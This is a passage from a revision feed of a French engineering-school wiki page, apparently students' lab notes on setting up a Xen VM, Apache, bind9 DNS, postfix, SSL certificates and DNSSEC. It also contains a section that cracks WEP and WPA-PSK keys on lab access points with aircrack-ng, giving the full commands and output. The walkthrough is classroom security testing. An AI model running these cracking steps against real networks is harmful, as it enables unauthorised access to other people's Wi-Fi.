&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35651</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35651"/>
				<updated>2016-12-06T10:23:22Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : /* Cassage clé */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
